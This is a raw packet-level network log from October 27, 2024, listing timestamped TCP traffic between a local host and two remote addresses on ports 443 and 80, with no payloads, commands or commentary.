Oct 27, 2024 17:11:07.722810984 CET	57742	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.722837925 CET	57742	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.722851038 CET	443	57742	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.722862005 CET	57742	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.722867966 CET	443	57742	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.723006964 CET	443	57743	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.723243952 CET	443	57743	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.723297119 CET	57743	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.723328114 CET	57743	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.723335981 CET	443	57743	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.723345041 CET	57743	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.723350048 CET	443	57743	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.724883080 CET	57748	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.724898100 CET	443	57748	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.724950075 CET	57748	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.725012064 CET	57749	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.725037098 CET	443	57749	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.725080967 CET	57748	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.725086927 CET	57749	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.725090027 CET	443	57748	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.725301027 CET	57749	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.725315094 CET	443	57749	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.844338894 CET	443	57745	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.844624996 CET	443	57745	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.844696999 CET	57745	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.844773054 CET	57745	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.844773054 CET	57745	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.844805002 CET	443	57745	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.844829082 CET	443	57745	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.846874952 CET	57750	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.846894026 CET	443	57750	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:07.846965075 CET	57750	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.847090006 CET	57750	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:07.847103119 CET	443	57750	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.194405079 CET	57736	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:08.194709063 CET	57751	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:08.200208902 CET	80	57751	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:08.200295925 CET	80	57736	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:08.200297117 CET	57751	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:08.200345039 CET	57736	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:08.200527906 CET	57751	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:08.205868959 CET	80	57751	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:08.442167044 CET	443	57746	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.442696095 CET	57746	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.442754984 CET	443	57746	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.443099022 CET	57746	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.443114996 CET	443	57746	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.445385933 CET	443	57747	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.445657015 CET	57747	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.445697069 CET	443	57747	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.445981979 CET	57747	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.445997000 CET	443	57747	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.461637974 CET	443	57748	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.461859941 CET	57748	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.461870909 CET	443	57748	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.462158918 CET	57748	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.462163925 CET	443	57748	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.472938061 CET	443	57749	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.473165035 CET	57749	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.473186016 CET	443	57749	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.473464966 CET	57749	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.473472118 CET	443	57749	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.571480989 CET	443	57746	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.571628094 CET	443	57746	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.571692944 CET	57746	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.571749926 CET	57746	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.571749926 CET	57746	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.571784019 CET	443	57746	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.571809053 CET	443	57746	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.573065996 CET	443	57747	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.573204041 CET	443	57747	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.573266029 CET	57747	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.573404074 CET	57747	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.573404074 CET	57747	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.573450089 CET	443	57747	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.573476076 CET	443	57747	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.574541092 CET	57752	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.574572086 CET	443	57752	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.574654102 CET	57752	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.574845076 CET	57752	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.574856043 CET	443	57752	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.576080084 CET	57753	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.576164961 CET	443	57753	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.576241016 CET	57753	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.576386929 CET	57753	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.576421022 CET	443	57753	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.585144043 CET	443	57750	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.585455894 CET	57750	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.585464954 CET	443	57750	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.585839987 CET	57750	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.585844994 CET	443	57750	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.593307972 CET	443	57748	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.593378067 CET	443	57748	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.593411922 CET	57748	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.593516111 CET	57748	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.593524933 CET	443	57748	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.593538046 CET	57748	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.593542099 CET	443	57748	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.595408916 CET	57754	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.595422983 CET	443	57754	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.595487118 CET	57754	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.595607042 CET	57754	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.595619917 CET	443	57754	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.602018118 CET	443	57749	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.602150917 CET	443	57749	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.602210045 CET	57749	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.602247000 CET	57749	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.602247000 CET	57749	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.602261066 CET	443	57749	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.602272987 CET	443	57749	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.604068041 CET	57755	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.604079008 CET	443	57755	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.604123116 CET	57755	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.604286909 CET	57755	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.604296923 CET	443	57755	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.717206955 CET	443	57750	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.717431068 CET	443	57750	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.717497110 CET	57750	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.717514038 CET	57750	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.717523098 CET	443	57750	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.717540026 CET	57750	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.717544079 CET	443	57750	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.719333887 CET	57756	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.719419956 CET	443	57756	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:08.719513893 CET	57756	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.719629049 CET	57756	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:08.719661951 CET	443	57756	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.075877905 CET	80	57751	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:09.075978041 CET	57751	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:09.318203926 CET	443	57752	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.319113016 CET	57752	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.319133997 CET	443	57752	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.319933891 CET	57752	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.319938898 CET	443	57752	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.324811935 CET	443	57753	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.325227022 CET	57753	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.325298071 CET	443	57753	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.326204062 CET	443	57754	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.329699039 CET	57753	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.329716921 CET	443	57753	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.343209982 CET	57754	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.343219995 CET	443	57754	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.345041037 CET	57754	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.345046997 CET	443	57754	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.354381084 CET	443	57755	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.355715036 CET	57755	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.355736017 CET	443	57755	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.357570887 CET	57755	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.357583046 CET	443	57755	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.448201895 CET	443	57752	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.448286057 CET	443	57752	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.448349953 CET	57752	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.448534012 CET	57752	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.448546886 CET	443	57752	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.448554993 CET	57752	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.448559046 CET	443	57752	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.450948954 CET	57757	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.450995922 CET	443	57757	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.451102972 CET	57757	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.451205015 CET	57757	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.451221943 CET	443	57757	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.456218958 CET	443	57756	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.456470966 CET	443	57753	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.456470966 CET	57756	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.456517935 CET	443	57756	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.456600904 CET	443	57753	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.456664085 CET	57753	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.456778049 CET	57756	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.456794977 CET	443	57756	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.456840038 CET	57753	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.456872940 CET	443	57753	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.456903934 CET	57753	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.456919909 CET	443	57753	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.459357977 CET	57758	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.459404945 CET	443	57758	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.459527016 CET	57758	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.459755898 CET	57758	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.459784985 CET	443	57758	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.470892906 CET	443	57754	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.471169949 CET	443	57754	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.471240997 CET	57754	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.471420050 CET	57754	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.471420050 CET	57754	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.471426010 CET	443	57754	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.471431971 CET	443	57754	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.473332882 CET	57759	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.473356009 CET	443	57759	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.473432064 CET	57759	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.473614931 CET	57759	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.473624945 CET	443	57759	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.485888958 CET	443	57755	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.486027956 CET	443	57755	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.486105919 CET	57755	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.486181021 CET	57755	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.486206055 CET	443	57755	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.486229897 CET	57755	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.486242056 CET	443	57755	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.488609076 CET	57760	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.488683939 CET	443	57760	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.488879919 CET	57760	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.489109039 CET	57760	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.489144087 CET	443	57760	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.586457014 CET	443	57756	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.586617947 CET	443	57756	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.586703062 CET	57756	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.586781025 CET	57756	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.586781025 CET	57756	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.586833000 CET	443	57756	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.586875916 CET	443	57756	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.589066982 CET	57761	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.589169025 CET	443	57761	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:09.589267969 CET	57761	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.589394093 CET	57761	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:09.589426041 CET	443	57761	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.195835114 CET	443	57757	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.196250916 CET	57757	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.196316004 CET	443	57757	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.196743965 CET	57757	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.196758986 CET	443	57757	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.204555988 CET	443	57759	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.204907894 CET	57759	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.204926014 CET	443	57759	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.205598116 CET	57759	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.205609083 CET	443	57759	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.238115072 CET	443	57760	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.238548994 CET	57760	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.238605976 CET	443	57760	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.238900900 CET	57760	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.238914013 CET	443	57760	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.240436077 CET	443	57758	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.240736961 CET	57758	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.240797997 CET	443	57758	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.241082907 CET	57758	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.241095066 CET	443	57758	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.351541042 CET	443	57757	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.351692915 CET	443	57757	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.351771116 CET	57757	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.351895094 CET	57757	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.351933002 CET	443	57757	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.351979017 CET	57757	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.351993084 CET	443	57757	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.352937937 CET	443	57759	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.353199005 CET	443	57759	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.353277922 CET	57759	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.353310108 CET	57759	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.353310108 CET	57759	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.353327036 CET	443	57759	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.353348970 CET	443	57759	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.354916096 CET	57762	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.355004072 CET	443	57762	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.355124950 CET	57762	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.355237007 CET	57762	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.355257988 CET	443	57762	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.355293989 CET	57763	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.355371952 CET	443	57763	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.355448961 CET	57763	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.355622053 CET	57763	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.355652094 CET	443	57763	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.362881899 CET	443	57761	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.363213062 CET	57761	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.363234043 CET	443	57761	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.363565922 CET	57761	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.363583088 CET	443	57761	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.370290041 CET	443	57760	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.370433092 CET	443	57760	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.370505095 CET	57760	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.370573997 CET	57760	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.370573997 CET	57760	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.370603085 CET	443	57760	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.370628119 CET	443	57760	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.372648954 CET	57764	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.372667074 CET	443	57764	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.372751951 CET	57764	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.372905970 CET	57764	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.372917891 CET	443	57764	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.373177052 CET	443	57758	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.373320103 CET	443	57758	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.373426914 CET	57758	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.373512030 CET	57758	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.373512030 CET	57758	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.373553038 CET	443	57758	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.373579025 CET	443	57758	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.375591040 CET	57765	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.375674963 CET	443	57765	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.375757933 CET	57765	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.375955105 CET	57765	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.375988007 CET	443	57765	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.494235992 CET	443	57761	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.494376898 CET	443	57761	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.494514942 CET	57761	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.494570971 CET	57761	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.494570971 CET	57761	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.494606018 CET	443	57761	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.494627953 CET	443	57761	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.497200012 CET	57766	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.497215986 CET	443	57766	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.497478962 CET	57766	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.497695923 CET	57766	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:10.497714043 CET	443	57766	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:10.756774902 CET	57751	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:10.757014990 CET	57767	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:10.763802052 CET	80	57767	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:10.763883114 CET	57767	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:10.764023066 CET	57767	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:10.764285088 CET	80	57751	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:10.764343023 CET	57751	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:10.769253969 CET	80	57767	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:11.076210022 CET	443	57763	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.076642036 CET	57763	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.076729059 CET	443	57763	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.077039003 CET	57763	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.077054024 CET	443	57763	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.114834070 CET	443	57764	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.115113020 CET	57764	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.115120888 CET	443	57764	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.115449905 CET	57764	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.115454912 CET	443	57764	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.116280079 CET	443	57762	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.116570950 CET	57762	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.116630077 CET	443	57762	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.117090940 CET	57762	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.117105007 CET	443	57762	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.137674093 CET	443	57765	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.137988091 CET	57765	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.138025045 CET	443	57765	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.138417006 CET	57765	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.138430119 CET	443	57765	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.204091072 CET	443	57763	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.204217911 CET	443	57763	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.204297066 CET	57763	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.204417944 CET	57763	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.204458952 CET	443	57763	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.204502106 CET	57763	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.204516888 CET	443	57763	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.206780910 CET	57768	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.206813097 CET	443	57768	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.206876993 CET	57768	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.207057953 CET	57768	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:11.207071066 CET	443	57768	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:11.248553038 CET	443	57764	13.107.246.51	192.168.2.4
